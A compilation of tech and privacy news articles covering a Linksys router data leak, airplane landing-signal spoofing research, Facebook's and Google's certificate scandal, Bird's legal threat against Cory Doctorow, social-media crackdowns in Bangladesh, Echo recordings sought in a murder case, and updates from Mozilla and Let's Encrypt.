>20,000 Linksys routers leak historic record of every device ever connected

>20,000 Linksys routers leak historic record of every device ever connected

(credit: US Navy)

(credit: Troy Mursch)

Independent researcher Troy Mursch said the leak is the result of a flaw in almost three dozen models of Linksys routers. It took about 25 minutes for the Binary Edge search engine of Internet-connected devices to find 21,401 vulnerable devices on Friday. A scan earlier in the week found 25,617. They were leaking a total of 756,565 unique MAC addresses. Exploiting the flaw requires only a few lines of code that harvest every MAC address, device name, and operating system that has ever connected to each of them.

Read 9 remaining paragraphs | Comments

The radio navigation planes use to land safely is insecure and can be hacked

A plane in the researchers' demonstration attack as spoofed ILS signals induce a pilot to land to the right of the runway.

Enlarge / A plane in the researchers’ demonstration attack as spoofed ILS signals induce a pilot to land to the right of the runway. (credit: Sathaye et al.)

software defined radio, the researchers can spoof airport signals in a way that causes a pilot’s navigation instruments to falsely indicate a plane is off course. Normal training will call for the pilot to adjust the plane’s descent rate or alignment accordingly and create a potential accident as a result.

Read 36 remaining paragraphs | Comments

Everything you need to know about Facebook, Google’s app scandal

Facebook and Google landed in hot water with Apple this week after two investigations by TechCrunch revealed the misuse of internal-only certificates — leading to their revocation, which led to a day of downtime at the two tech giants.

Confused about what happened? Here’s everything you need to know.

How did all this start, and what happened?

On Monday, we revealed that Facebook was misusing an Apple-issued enterprise certificate that is only meant for companies to use to distribute internal, employee-only apps without having to go through the Apple App Store. But the social media giant used that certificate to sign an app that Facebook distributed outside the company, violating Apple’s rules.

The app, known simply as “Research,” allowed Facebook unparalleled access to all of the data flowing out of a device. This included access to some of the users’ most sensitive network data. Facebook paid users — including teenagers — $20 per month to install the app. But it wasn’t clear exactly what kind of data was being vacuumed up, or for what reason.

It turns out that the app was a repackaged app that was effectively banned from Apple’s App Store last year for collecting too much data on users.

Apple was angry that Facebook was misusing its special-issue enterprise certificates to push an app it already banned, and revoked it — rendering the app unable to open. But Facebook was using that same certificate to sign its other employee-only apps, effectively knocking them offline until Apple re-issued the certificate.

Then, it turned out Google was doing almost exactly the same thing with its Screenwise app, and Apple’s ban-hammer fell again.

What’s the controversy over these enterprise certificates and what can they do?

If you want to develop Apple apps, you have to abide by its rules — and Apple expressly makes companies agree to its terms.

A key rule is that Apple doesn’t allow app developers to bypass the App Store, where every app is vetted to ensure it’s as secure as it can be. It does, however, grant exceptions for enterprise developers, such as to companies that want to build apps that are only used internally by employees. Facebook and Google in this case signed up to be enterprise developers and agreed to Apple’s developer terms.

Each Apple-issued certificate grants companies permission to distribute apps they develop internally — including pre-release versions of the apps they make, for testing purposes. But these certificates aren’t allowed to be used for ordinary consumers, as they have to download apps through the App Store.

What’s a “root” certificate, and why is its access a big deal?

Because Facebook’s Research and Google’s Screenwise apps were distributed outside of Apple’s App Store, it required users to manually install the app — known as sideloading. That requires users to go through a convoluted few steps of downloading the app itself, and opening and trusting either Facebook or Google’s enterprise developer code-signing certificate, which is what allows the app to run.

Both companies required users after the app installed to agree to an additional configuration step — known as a VPN configuration profile — allowing all of the data flowing out of that user’s phone to funnel down a special tunnel that directs it all to either Facebook or Google, depending on which app you installed.

This is where the Facebook and Google cases differ.

Google’s app collected data and sent it off to Google for research purposes, but couldn’t access encrypted data — such as the content of any network traffic protected by HTTPS, as most apps in the App Store and internet websites are.

Facebook, however, went far further. Its users were asked to go through an additional step to trust an additional type of certificate at the “root” level of the phone. Trusting this Facebook Research root certificate authority allowed the social media giant to look at all of the encrypted traffic flowing out of the device — essentially what we call a “man-in-the-middle” attack. That allowed Facebook to sift through your messages, your emails and any other bit of data that leaves your phone. Only apps that use certificate pinning — which reject any certificate that isn’t its own — were protected, such as iMessage, Signal and additionally any other end-to-end encrypted solutions.

Facebook’s Research app requires Root Certificate access, which Facebook gather almost any piece of data transmitted by your phone (Image: supplied)

Google’s app might not have been able to look at encrypted traffic, but the company still flouted the rules — and had its separate enterprise developer code-signing certificate revoked anyway.

What data did Facebook have access to on iOS?

It’s hard to know for sure, but it definitely had access to more data than Google.

Facebook said its app was to help it “understand how people use their mobile devices.” In reality, at root traffic level, Facebook could have accessed any kind of data that left your phone.

Will Strafach, a security expert with whom we spoke for our story, said: “If Facebook makes full use of the level of access they are given by asking users to install the certificate, they will have the ability to continuously collect the following types of data: private messages in social media apps, chats from in instant messaging apps – including photos/videos sent to others, emails, web searches, web browsing activity, and even ongoing location information by tapping into the feeds of any location tracking apps you may have installed.”

Remember: this isn’t “root” access to your phone, like jailbreaking, but root access to the network traffic.

How does this compare to the technical ways other market research programs work?

In fairness, these aren’t market research apps unique to Facebook or Google. Several other companies, like Nielsen and comScore, run similar programs, but neither ask users to install a VPN or provide root access to the network.

In any case, Facebook already has a lot of your data — as does Google. Even if the companies only wanted to look at your data in aggregate with other people, it can still hone in on who you talk to, when, for how long and, in some cases, what about. It might not have been such an explosive scandal had Facebook not spent the last year cleaning up after several security and privacy breaches.

Can they capture the data of people the phone owner interacts with?

In both cases, yes. In Google’s case, any unencrypted data that involves another person’s data could have been collected. In Facebook’s case, it goes far further — any data of yours that interacts with another person, such as an email or a message, could have been collected by Facebook’s app.

How many people did this affect?

It’s hard to know for sure. Neither Google nor Facebook have said how many users they have. Between them, it’s believed to be in the thousands. As for the employees affected by the app outages, Facebook has more than 35,000 employees and Google has more than 94,000 employees.

Why did internal apps at Facebook and Google break after Apple revoked the certificates?

You might own your Apple device, but Apple still gets to control what goes on it.

Apple can’t control Facebook’s root certificates, but it can control the enterprise certificates it issues. After Facebook was caught out, Apple said: “Any developer using their enterprise certificates to distribute apps to consumers will have their certificates revoked, which is what we did in this case to protect our users and their data.” That meant any app that relied on Facebook’s enterprise certificate — including inside the company — would fail to load. That’s not just pre-release builds of Facebook, Instagram and WhatsApp that staff were working on, but reportedly the company’s travel and collaboration apps were down. In Google’s case, even its catering and lunch menu apps were down.

Facebook’s internal apps were down for about a day, while Google’s internal apps were down for a few hours. None of Facebook or Google’s consumer services were affected, however.

How are people viewing Apple in all this?

Nobody seems thrilled with Facebook or Google at the moment, but not many are happy with Apple, either. Even though Apple sells hardware and doesn’t use your data to profile you or serve you ads — like Facebook and Google do — some are uncomfortable with how much power Apple has over the customers — and enterprises — that use its devices.

In revoking Facebook and Google’s enterprise certificates and causing downtime, it has a knock-on effect internally.

Is this legal in the U.S.? What about in Europe with GDPR?

Well, it’s not illegal — at least in the U.S. Facebook says it gained consent from its users. The company even said its teenage users must obtain parental consent, even though it was easily skippable and no verification checks were made. It wasn’t even explicitly clear that the children who “consented” really understood how much privacy they were really handing over.

That could lead to major regulatory headaches down the line. “If it turns out that European teens have been participating in the research effort Facebook could face another barrage of complaints under the bloc’s General Data Protection Regulation (GDPR) — and the prospect of substantial fines if any local agencies determine it failed to live up to consent and ‘privacy by design’ requirements baked into the bloc’s privacy regime,” wrote TechCrunch’s Natasha Lomas.

Who else has been misusing certificates?

Don’t think that Facebook and Google are alone in this. It turns out that a lot of companies might be flouting the rules, too.

According to many finding companies on social media, Sonos uses enterprise certificates for its beta program, as does finance app Binance, as well as DoorDash for its fleet of contractors. It’s not known if Apple will also revoke their enterprise certificates.

What next?

It’s anybody’s guess, but don’t expect this situation to die down any time soon.

Facebook may face repercussions with Europe, as well as at home. Two U.S. senators, Mark Warner and Richard Blumenthal, have already called for action, accusing Facebook of “wiretapping teens.” The Federal Trade Commission may also investigate, if Blumenthal gets his way.

Scooter startup Bird tried to silence a journalist. It did not go well.

Cory Doctorow doesn’t like censorship. He especially doesn’t like his own work being censored.

Anyone who knows Doctorow knows his popular tech and culture blog, Boing Boing, and anyone who reads Boing Boing knows Doctorow and his cohort of bloggers. The part-blogger, part special advisor at the online rights group Electronic Frontier Foundation has written for years on topics of technology, hacking, security research, online digital rights and censorship and its intersection with free speech and expression.

Yet, this week it looked like his own free speech and expression could have been under threat.

Doctorow revealed in a blog post on Friday that scooter startup Bird sent him a legal threat, accusing him of copyright infringement and that his blog post encourages “illegal conduct.”

In its letter to Doctorow, Bird demanded that he “immediately take[s] down this offensive blog.”

Doctorow declined, published the legal threat and fired back with a rebuttal letter from the EFF accusing the scooter startup of making “baseless legal threats” in an attempt to “suppress coverage that it dislikes.”

The whole debacle started after Doctorow wrote about how Bird’s many abandoned scooters can be easily converted into a “personal scooter” by swapping out its innards with a plug-and-play converter kit. Citing an initial write-up by Hackaday, these scooters can have “all recovery and payment components permanently disabled” using the converter kit, available for purchase from China on eBay for about $30.

In fact, Doctorow’s blog post was only two paragraphs long and, though didn’t link to the eBay listing directly, did cite the hacker who wrote about it in the first place — bringing interesting things to the masses in bite-size form in true Boing Boing fashion.

Bird didn’t like this much, and senior counsel Linda Kwak sent the letter — which the EFF published today — claiming that Doctorow’s blog post was “promoting the sale/use of an illegal product that is solely designed to circumvent the copyright protections of Bird’s proprietary technology, as described in greater detail below, as well as promoting illegal activity in general by encouraging the vandalism and misappropriation of Bird property.” The letter also falsely stated that Doctorow’s blog post “provides links to a website where such Infringing Product may be purchased,” given that the post at no point links to the purchasable eBay converter kit.

EFF senior attorney Kit Walsh fired back. “Our client has no obligation to, and will not, comply with your request to remove the article,” she wrote. “Bird may not be pleased that the technology exists to modify the scooters that it deploys, but it should not make baseless legal threats to silence reporting on that technology.”

The three-page rebuttal says Bird used incorrectly cited legal statutes to substantiate its demands for Boing Boing to pull down the blog post. The letter added that unplugging and discarding a motherboard containing unwanted code within the scooter isn’t an act of circumventing as it doesn’t bypass or modify Bird’s code — which copyright law says is illegal.

As Doctorow himself put it in his blog post Friday: “If motherboard swaps were circumvention, then selling someone a screwdriver could be an offense punishable by a five year prison sentence and a $500,000 fine.”

In an email to TechCrunch, Doctorow said that legal threats “are no fun.”

AUSTIN, TX – MARCH 10: Journalist Cory Doctorow speaks onstage at “Snowden 2.0: A Field Report from the NSA Archives” during the 2014 SXSW Music, Film + Interactive Festival at Austin Convention Center on March 10, 2014 in Austin, Texas. (Photo by Travis P Ball/Getty Images for SXSW)

“We’re a small, shoestring operation, and even though this particular threat is one that we have very deep expertise on, it’s still chilling when a company with millions in the bank sends a threat — even a bogus one like this — to you,” he said.

The EFF’s response also said that Doctorow’s freedom of speech “does not in fact impinge on any of Bird’s rights,” adding that Bird should not send takedown notices to journalists using “meritless legal claims,” the letter said.

“So, in a sense, it doesn’t matter whether Bird is right or wrong when it claims that it’s illegal to convert a Bird scooter to a personal scooter,” said Walsh in a separate blog post. “Either way, Boing Boing was free to report on it,” she added.

What’s bizarre is why Bird targeted Doctorow and, apparently, nobody else — so far.

TechCrunch reached out to several people who wrote about and were involved with blog posts and write-ups about the Bird converter kit. Of those who responded, all said they had not received a legal demand from Bird.

We asked Bird why it sent the letter, and if this was a one-off letter or if Bird had sent similar legal demands to others. When reached, a Bird spokesperson did not comment on the record.

Two hours after we published this story, Bird spokesperson Rebecca Hahn said the company supports freedom of speech, adding: “In the quest for curbing illegal activities related to our vehicles, our legal team overstretched and sent a takedown request related to the issue to a member of the media. This was our mistake and we apologize to Cory Doctorow.”

All too often, companies send legal threats and demands to try to silence work or findings that they find critical, often using misinterpreted, incorrect or vague legal statutes to get things pulled from the internet. Some companies have been more successful than others, despite an increase in awareness and bug bounties, and a general willingness to fix security issues before they inevitably become public.

Now Bird becomes the latest in a long list of companies that have threatened reporters or security researchers, alongside companies like drone maker DJI, which in 2017 threatened a security researcher trying to report a bug in good faith, and spam operator River City, which sued a security researcher who found the spammer’s exposed servers and a reporter who wrote about it. Most recently, password manager maker Keeper sued a security reporter claiming allegedly defamatory remarks over a security flaw in one of its products. The case was eventually dropped, but not before more than 50 experts, advocates and journalist (including this reporter) signed onto a letter calling for companies to stop using legal threats to stifle and silence security researchers.

That effort resulted in several companies — notably Dropbox and Tesla — to double down on their protection of security researchers by changing their vulnerability disclosure rules to promise that the companies will not seek to prosecute hackers acting in good-faith.

But some companies have bucked that trend and have taken a more hostile, aggressive — and regressive — approach to security researchers and reporters.

“Bird Scooters and other dockless transport are hugely controversial right now, thanks in large part to a ‘move-fast, break-things’ approach to regulation, and it’s not surprising that they would want to control the debate,” said Doctorow.

“But to my mind, this kind of bullying speaks volumes about the overall character of the company,” he said.

Updated at 6pm ET: with statement from Bird.

Facebook is not equipped to stop the spread of authoritarianism

After the driver of a speeding bus ran over and killed two college students in Dhaka in July, student protesters took to the streets. They forced the ordinarily disorganized local traffic to drive in strict lanes and stopped vehicles to inspect license and registration papers. They even halted the vehicle of the chief of Bangladesh Police Bureau of Investigation and found that his license was expired. And they posted videos and information about the protests on Facebook.

The fatal road accident that led to these protests was hardly an isolated incident. Dhaka, Bangladesh’s capital, which was ranked the second least livable city in the world in the Economist Intelligence Unit’s 2018 global liveability index, scored 26.8 out of 100 in the infrastructure category included in the rating. But the regional government chose to stifle the highway safety protests anyway. It went so far as raids of residential areas adjacent to universities to check social media activity, leading to the arrest of 20 students. Although there were many images of Bangladesh Chhatra League, or BCL men, committing acts of violence on students, none of them were arrested. (The BCL is the student wing of the ruling Awami League, one of the major political parties of Bangladesh.)

Students were forced to log into their Facebook profiles and were arrested or beaten for their posts, photographs and videos. In one instance, BCL men called three students into the dorm’s guest room, quizzed them over Facebook posts, beat them, then handed them over to police. They were reportedly tortured in custody.

A pregnant school teacher was arrested and jailed for just over two weeks for “spreading rumors” due to sharing a Facebook post about student protests. A photographer and social justice activist spent more than 100 days in jail for describing police violence during these protests; he told reporters he was beaten in custody. And a university professor was jailed for 37 days for his Facebook posts.

A Dhaka resident who spoke on the condition of anonymity out of fear for their safety said that the crackdown on social media posts essentially silenced student protesters, many of whom removed from their profiles entirely photos, videos and status updates about the protests. While the person thought that students were continuing to be arrested, they said, “nobody is talking about it anymore — at least in my network — because everyone kind of ‘got the memo,’ if you know what I mean.”

This isn’t the first time Bangladeshi citizens have been arrested for Facebook posts. As just one example, in April 2017, a rubber plantation worker in southern Bangladesh was arrested and detained for three months for liking and sharing a Facebook post that criticized the prime minister’s visit to India, according to Human Rights Watch.

Bangladesh is far from alone. Government harassment to silence dissent on social media has occurred across the region, and in other regions as well — and it often comes hand-in-hand with governments filing takedown requests with Facebook and requesting data on users.

Facebook has removed posts critical of the prime minister in Cambodia and reportedly “agreed to coordinate in the monitoring and removal of content” in Vietnam. Facebook was criticized for not stopping the repression of Rohingya Muslims in Myanmar, where military personnel created fake accounts to spread propaganda, which human rights groups say fueled violence and forced displacement. Facebook has since undertaken a human rights impact assessment in Myanmar, and it also took down coordinated inauthentic accounts in the country.

UNITED STATES – APRIL 10: Facebook CEO Mark Zuckerberg testifies during the Senate Commerce, Science and Transportation Committee and Senate Judiciary Committee joint hearing on “Facebook, Social Media Privacy, and the Use and Abuse of Data” on Tuesday, April 10, 2018. (Photo By Bill Clark/CQ Roll Call)

Protesters scrubbing Facebook data for fear of repercussion isn’t uncommon. Over and over again, authoritarian-leaning regimes have utilized low-tech strategies to quell dissent. And aside from providing resources related to online privacy and security, Facebook still has little in place to protect its most vulnerable users from these pernicious efforts. As various countries pass laws calling for a local presence and increased regulation, it is possible that the social media conglomerate doesn’t always even want to.

“In many situations, the platforms are under pressure,” said Raman Jit Singh Chima, policy director at Access Now. “Tech companies are being directly sent takedown orders, user data requests. The danger of that is that companies will potentially be overcomplying or responding far too quickly to government demands when they are able to push back on those requests,” he said.

Elections are often a critical moment for oppressive behavior from governments — Uganda, Chad and Vietnam have specifically targeted citizens — and candidates — during election time. Facebook announced just last Thursday that it had taken down nine Facebook pages and six Facebook accounts for engaging in coordinated inauthentic behavior in Bangladesh. These pages, which Facebook believes were linked to people associated with the Bangladesh government, were “designed to look like independent news outlets and posted pro-government and anti-opposition content.” The sites masqueraded as news outlets, including fake BBC Bengali, BDSNews24 and Bangla Tribune and news pages with Photoshopped blue checkmarks, according to the Atlantic Council’s Digital Forensic Research Lab.

Still, the imminent election in Bangladesh doesn’t bode well for anyone who might wish to express dissent. In October, a digital security bill that regulates some types of controversial speech was passed in the country, signaling to companies that as the regulatory environment tightens, they too could become targets.

More restrictive regulation is part of a greater trend around the world, said Naman M. Aggarwal, Asia policy associate at Access Now. Some countries, like Brazil and India, have passed “fake news” laws. (A similar law was proposed in Malaysia, but it was blocked in the Senate.) These types of laws are frequently followed by content takedowns. (In Bangladesh, the government warned broadcasters not to air footage that could create panic or disorder, essentially halting news programming on the protests.)

Other governments in the Middle East and North Africa — such as Egypt, Algeria, United Arab Emirates, Saudi Arabia and Bahrain — clamp down on free expression on social media under the threat of fines or prison time. And countries like Vietnam have passed laws requiring social media companies to localize their storage and have a presence in the country — typically an indication of greater content regulation and pressure on the companies from local governments. In India, WhatsApp and other financial tech services were told to open offices in the country.

And crackdowns on posts about protests on social media come hand-in-hand with government requests for data. Facebook’s biannual transparency report provides detail on the percentage of government requests with which the company complies in each country, but most people don’t know until long after the fact. Between January and June, the company received 134 emergency requests and 18 legal processes from Bangladeshi authorities for 205 users or accounts. Facebook turned over at least some data in 61 percent of emergency requests and 28 percent of legal processes.

Facebook said in a statement that it “believes people deserve to have a voice, and that everyone has the right to express themselves in a safe environment,” and that it handles requests for user data “extremely carefully.”

The company pointed to its Facebook for Journalists resources and said it is “saddened by governments using broad and vague regulation or other practices to silence, criminalize or imprison journalists, activists, and others who speak out against them,” but the company said it also helps journalists, activists and other people around the world to “tell their stories in more innovative ways, reach global audiences, and connect directly with people.”

But there are policies that Facebook could enact that would help people in these vulnerable positions, like allowing users to post anonymously.

“Facebook’s real names policy doesn’t exactly protect anonymity, and has created issues for people in countries like Vietnam,” said Aggarwal. “If platforms provide leeway, or enough space for anonymous posting, and anonymous interactions, that is really helpful to people on the ground.”

BERLIN, GERMANY – SEPTEMBER 12: A visitor uses a mobile phone in front of the Facebook logo at the #CDUdigital conference on September 12, 2015 in Berlin, Germany. (Photo by Adam Berry/Getty Images)

A German court in February found the policy illegal under its decade-old privacy law. Facebook said it plans to appeal the decision.

“I’m not sure if Facebook even has an effective strategy or understanding of strategy in the long term,” said Sean O’Brien, lead researcher at Yale Privacy Lab. “In some cases, Facebook is taking a very proactive role… but in other cases, it won’t.” In any case, these decisions require a nuanced understanding of the population, culture, and political spectrum in various regions — something it’s not clear Facebook has.

Facebook isn’t responsible for government decisions to clamp down on free expression. But the question remains: How can companies stop assisting authoritarian governments, inadvertently or otherwise?

“If Facebook knows about this kind of repression, they should probably have… some sort of mechanism to at the very least heavily try to convince people not to post things publicly that they think they could get in trouble for,” said O’Brien. “It would have a chilling effect on speech, of course, which is a whole other issue, but at least it would allow people to make that decision for themselves.”

This could be an opt-in feature, but O’Brien acknowledges that it could create legal liabilities for Facebook, leading the social media giant to create lists of “dangerous speech” or profiles on “dissidents,” and could theoretically shut them down or report them to the police. Still, Facebook could consider rolling a “speech alert” feature to an entire city or country if that area becomes volatile politically and dangerous for speech, he said.

O’Brien says that social media companies could consider responding to situations where a person is being detained illegally and potentially coerced into giving their passwords in a way that could protect them, perhaps by triggering a temporary account reset or freeze to prevent anyone from accessing the account without proper legal process. Some actions that might trigger the reset or freeze could be news about an individual’s arrest — if Facebook is alerted to it, contact from the authorities, or contact from friends and loved ones, as evaluated by humans. There could even be a “panic button” type trigger, like Guardian Project’s PanicKit, but for Facebook — allowing users to wipe or freeze their own accounts or posts tagged preemptively with a code word only the owner knows.

“One of the issues with computer interfaces is that when people log into a site, they get a false sense of privacy even when the things they’re posting in that site are widely available to the public,” said O’Brien. Case in point: this year, women anonymously shared their experiences of abusive co-workers in a shared Google Doc — the so-called “Shitty Media Men” list, likely without realizing that a lawsuit could unmask them. That’s exactly what is happening.

Instead, activists and journalists often need to tap into resources and gain assistance from groups like Access Now, which runs a digital security helpline, and the Committee to Protect Journalists. These organizations can provide personal advice tailored to their specific country and situation. They can access Facebook over the Tor anonymity network. Then can use VPNs, and end-to-end encrypted messaging tools, and non-phone-based two-factor authentication methods. But many may not realize what the threat is until it’s too late.

The violent crackdown on free speech in Bangladesh accompanied government-imposed internet restrictions, including the throttling of internet access around the country. Users at home with a broadband connection did not feel the effects of this, but “it was the students on the streets who couldn’t go live or publish any photos of what was going on,” the Dhaka resident said.

Elections will take place in Bangladesh on December 30.

In the few months leading up to the election, Access Now says it’s noticed an increase in Bangladeshi residents expressing concern that their data has been compromised and seeking assistance from the Digital Security hotline.

Other rights groups have also found an uptick in malicious activity.

Meenakshi Ganguly, South Asia director at Human Rights Watch, said in an email that the organization is “extremely concerned about the ongoing crackdown on the political opposition and on freedom of expression, which has created a climate of fear ahead of national elections.”

Ganguly cited politically motivated cases against thousands of opposition supporters, many of which have been arrested, as well as candidates that have been attacked.

Human Rights Watch issued a statement about the situation, warning that the Rapid Action Battalion, a “paramilitary force implicated in serious human rights violations including extrajudicial killings and enforced disappearances,” and has been “tasked with monitoring social media for ‘anti-state propaganda, rumors, fake news, and provocations.’” This is in addition to a nine-member monitoring cell and around 100 police teams dedicated to quashing so-called “rumors” on social media, amid the looming threat of news website shutdowns.

“The security forces continue to arrest people for any criticism of the government, including on social media,” Ganguly said. “We hope that the international community will urge the Awami League government to create conditions that will uphold the rights of all Bangladeshis to participate in a free and fair vote.”

Judge orders Amazon to turn over Echo recordings in double murder case

A New Hampshire judge has ordered Amazon to turn over two days of Amazon Echo recordings in a double murder case.

Prosecutors believe that recordings from an Amazon Echo in a Farmington home where two women were murdered in January 2017 may yield further clues to their killer. Although police seized the Echo when they secured the crime scene, any recordings are stored on Amazon servers.

The order granting the search warrant, obtained by TechCrunch, said that there is “probable cause to believe” that the Echo picked up “audio recordings capturing the attack” and “any events that preceded or succeeded the attack.”

Amazon is also directed to turn over any “information identifying any cellular devices that were linked to the smart speaker during that time period,” the order said.

Timothy Verrill, a resident of neighboring Dover, New Hampshire, was charged with two counts of first-degree murder. He pleaded not guilty and awaits trial.

When reached, an Amazon spokesperson did not comment — but the company told the Associated Press last week that it won’t release the information “without a valid and binding legal demand properly served on us.”

New Hampshire doesn’t provide electronic access to court records, so it’s not readily known if Amazon has complied with the order, signed by Justice Steven Houran, on November 5.

A court order signed by New Hampshire Superior Court on November 5 ordering Amazon to turn over Echo recordings. (Image: TechCrunch)

It’s not the first time Amazon has been ordered to turn over recordings that prosecutors believe may help a police investigation.

Three years ago, an Arkansas man was accused of murder. Prosecutors pushed Amazon to turn over data from an Echo found in the house where the body was found. Amazon initially resisted the request citing First Amendment grounds — but later conceded and complied. Police and prosecutors generally don’t expect much evidence from Echo recordings — if any — because Echo speakers are activated with a wake word — usually “Alexa,” the name of the voice assistant. But, sometimes fragment of recordings can be inadvertently picked up, which could help piece together events from a crime scene.

But these two cases represent a fraction of the number of requests Amazon receives for Echo data. Although Amazon publishes a biannual transparency report detailing the number of warrants and orders it receives across its entire business, the company doesn’t — and refuses — to break down how many requests for data it receives for Echo data.

In most cases, any request for Echo recordings are only known through court orders.

In fact, when TechCrunch reached out to the major players in the smart home space, only one device maker had a transparency report and most had no future plans to publish one — leaving consumers in the dark on how these companies protect your private information from overly broad demands.

Although the evidence in the Verrill case is compelling, exactly what comes back from Amazon — or the company’s refusal to budge — will be telling.

Mozilla ranks dozens of popular ‘smart’ gift ideas on creepiness and security

If you’re planning on picking up some cool new smart device for a loved one this holiday season, it might be worth your while to check whether it’s one of the good ones or not. Not just in the quality of the camera or step tracking, but the security and privacy practices of the companies that will collect (and sell) the data it produces. Mozilla has produced a handy resource ranking 70 of the latest items, from Amazon Echos to smart teddy bears.

Each of the dozens of toys and devices is graded on a number of measures: what data does it collect? Is that data encrypted when it is transmitted? Who is it shared with? Are you required to change the default password? And what’s the worst case scenario if something went wrong?

Some of the security risks are inherent to the product — for example, security cameras can potentially see things you’d rather they didn’t — but others are oversights on the part of the company. Security practices like respecting account deletion, not sharing data with third parties, and so on.

At the top of the list are items getting most of it right — this Mycroft smart speaker, for instance, uses open source software and the company that makes it makes all the right choices. Their privacy policy is even easy to read! Lots of gadgets seem just fine, really. This list doesn’t just trash everything.

On the other hand, you have something like this Dobby drone. They don’t seem to even have a privacy policy — bad news when you’re installing an app that records your location, HD footage, and other stuff! Similarly, this Fredi baby monitor comes with a bad password you don’t have to change, and has no automatic security updates. Are you kidding me? Stay far, far away.

All together 33 of the products met Mozilla’s recently proposed “minimum security standards” for smart devices (and got a nice badge); 7 failed, and the rest fell somewhere in between. In addition to these official measures there’s a crowd-sourced (hopefully not to be gamed) “creep-o-meter” where prospective buyers can indicate how creepy they find a device. But why is BB-8 creepy? I’d take that particular metric with a grain of salt.

New plans aim to deploy the first US quantum network from Boston to Washington, DC

About 800 kilometers of unused fiber optic cable running down the U.S. eastern seaboard is set to become the first stateside quantum network.

The aim is to get the quantum network up and running and accepting customers by the end of the year, making it the first time that quantum keys will be exchanged commercially on U.S. soil.

Quantum Xchange, a Bethesda, Maryland-based quantum communications provider, has inked a deal for Zayo, a fiber network giant, to provide the stretch of fiber from Boston to Washington, DC. Its first aim is to help connect Wall Street financiers with their back operations in nearby New Jersey, but the hope is that other industries — from healthcare to critical infrastructure — will soon use the network for their own secure communications.

Quantum cryptography and networking aren’t new concepts, but have risen to prominence in recent years as both a threat to some encryption and also the savior of future secure communications. Relying on photons and the laws of quantum physics to share encryption keys over a long distance from one place to another makes it significantly harder to intercept the keys without breaking the beam or perfectly cloning a copy. This technique, known as quantum key distribution (QKD), is seen as a likely contender for the future of end-to-end encryption.

Although quantum cryptography has been around for years, it’s only been recently that scientists and computer engineers have harnessed the technology for practical uses. Soon, the technology could be used for protecting elections, transmitting payments and securing communications between data centers — even from satellites back to earth.

Europe has already seen some success in building a small-scale quantum network, but “shortcomings” made bringing the system to the U.S. more difficult, said Quantum Xchange chief executive John Prisco.

His company uses trusted node technology that passes quantum key data from point to point over a larger distance, making it easier to scale a quantum network over wider geographical spaces.

“Organizations with offices in Boston will be able to send secure communications to a partner in D.C., and eventually even further – as the goal is to keep buying up optical fiber that is already in the ground all over the country so that we can provide a secure quantum network that will serve the entire nation,” he said.

Prisco said it’s “critical” to establish a quantum key distribution network as a defensive measure “before the unprecedented power of quantum computers become an offensive weapon.”

Mozilla’s Firefox Monitor will now alert you when one of your accounts was hacked

Earlier this year, Mozilla announced Firefox Monitor, a service that tells you if your online accounts were hacked in a recent data breach. All you have to give it is your email address and it’ll use the Have I Been Pwned database to show you if you need to worry and what data was compromised. Today, Mozilla is taking this a step further by also letting you sign up for alerts for when your accounts appear in any (known) breaches in the future.

When it first launched, Mozilla considered Firefox Monitor an experimental service. Now, it’s being launched as an official service.

If none of your accounts have been hacked yet, consider yourself lucky. That still makes you the perfect user for Firefox Monitor’s new alerting feature, though, because chances are your email address will show up in a future breach sooner or later. Indeed, when Mozilla first asked people about which features they most wanted from a service like this, notifications about future breaches were very high on most peoples’ lists.

Mozilla notes that Firefox Monitor is just one of a number of new data and privacy features the organization has on its roadmap for the next few months. It’s clear that Mozilla is positioning itself as a neutral force and overall, that seems to be going quite well, especially given that Google’s Chrome browser is facing a bit of a backlash these days as users are increasingly concerned about their privacy and the vast trove of data Google collects.

Firefox will soon start blocking trackers by default

Three years later, Let’s Encrypt has issued over 380 million HTTPS certificates

Bon anniversaire, Let’s Encrypt!

The free-to-use nonprofit was founded in 2014 in part by the Electronic Frontier Foundation and is backed by Akamai, Google, Facebook, Mozilla and more. Three years ago Friday, it issued its first certificate.

Since then, the numbers have exploded. To date, more than 380 million certificates have been issued on 129 million unique domains. That also makes it the largest certificate issuer in the world, by far.

Now, 75 percent of all Firefox traffic is HTTPS, according to public Firefox data — in part thanks to Let’s Encrypt. That’s a massive increase from when it was founded, where only 38 percent of website page loads were served over an HTTPS encrypted connection.

“Change at that speed and scale is incredible,” a spokesperson told TechCrunch. “Let’s Encrypt isn’t solely responsible for this change, but we certainly catalyzed it.”

HTTPS is what keeps the pipes of the web secure. Every time your browser lights up in green or flashes a padlock, it’s a TLS certificate encrypting the connection between your computer and the website, ensuring nobody can intercept and steal your data or modify the website.

But for years, the certificate market was broken, expensive and difficult to navigate. In an effort to “encrypt the web,” the EFF and others banded together to bring free TLS certificates to the masses.

That means bloggers, single-page websites and startups alike can get an easy-to-install certificate for free — even news sites like TechCrunch rely on Let’s Encrypt for a secure connection. Security experts and encryption advocates Scott Helme and Troy Hunt last month found that more than half of the top million websites by traffic are on HTTPS.

And as it’s grown, the certificate issuer has become trusted by the major players — including Apple, Google, Microsoft, Oracle and more.

A fully encrypted web is still a ways off. But with close to a million Let’s Encrypt certificates issued each day, it looks more within reach than ever.